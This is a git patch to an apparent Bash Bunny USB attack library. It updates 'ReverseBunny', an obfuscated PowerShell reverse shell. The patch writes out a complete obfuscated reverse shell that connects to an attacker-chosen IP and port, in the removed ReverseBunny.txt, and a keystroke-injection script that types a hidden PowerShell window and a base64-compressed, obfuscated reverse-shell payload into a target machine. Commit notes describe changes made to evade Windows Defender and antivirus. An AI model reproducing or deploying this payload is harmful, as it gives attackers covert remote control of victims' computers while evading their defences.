From 54505507b9c4d8516979b8fa003726f9b543573d Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Mon, 6 Dec 2021 21:08:42 +0100 Subject: [PATCH] Updated ReverseBunny to version 1.2 (#475) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 --- .../remote_access/ReverseBunny/README.md | 12 +++- .../ReverseBunny/ReverseBunny.txt | 1 - .../remote_access/ReverseBunny/payload.txt | 66 ++++++++----------- 3 files changed, 39 insertions(+), 40 deletions(-) delete mode 100644 payloads/library/remote_access/ReverseBunny/ReverseBunny.txt diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index ba8e344e..7fced069 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -2,8 +2,16 @@ Title: ReverseBunny Author: 0iphor13 -Version: 1.0 +Version: 1.2 Getting remote access via obfuscated reverse shell. -RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. +Change the variables in payload.txt to your attacking maschine & start your listener. + +Whats new in version 1.2? +- Changed the whole payload +- Added custom shell design + +Coming soon: +- Custom commands +- New evasion technique diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt deleted file mode 100644 index 65d50681..00000000 --- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt +++ /dev/null @@ -1 +0,0 @@ -$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"(); diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 945fac51..694781e6 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -3,53 +3,45 @@ # Title: ReverseBunny # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.1 +# Version: 1.2 # Category: Remote_Access -# Attackmodes: HID, Storage +# Attackmodes: HID LED SETUP -GET SWITCH_POSITION DUCKY_LANG de -rm /root/udisk/DONE +ATTACKMODE HID -ATTACKMODE HID STORAGE - -#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING - -LED STAGE1 +#If needed, use this option +#WAIT_FOR_PRESENT Your_Device DELAY 5000 -RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" -DELAY 6000 +Q GUI r +DELAY 5000 +Q STRING "powershell -NoP -NonI -W hidden" +DELAY 5000 +Q ENTER -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" -DELAY 10000 -Q ENTER -DELAY 10000 -Q CONTROL v -DELAY 10000 -Q ENTER DELAY 1000 - -LED STAGE2 - -until [ -f /root/udisk/DONE ] - do - sleep 0.2 -done - -LED CLEANUP - -rm /root/udisk/DONE - -DELAY 100 - -sync - -DELAY 100 +Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" +DELAY 1000 +Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" +DELAY 1000 +Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" +DELAY 1000 +Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" +DELAY 1000 +Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" +DELAY 1000 +Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" +DELAY 1000 +Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" +DELAY 1000 +Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" +DELAY 1000 +Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" +DELAY 1000 +Q ENTER LED FINISH - -#SAVE TO EJECT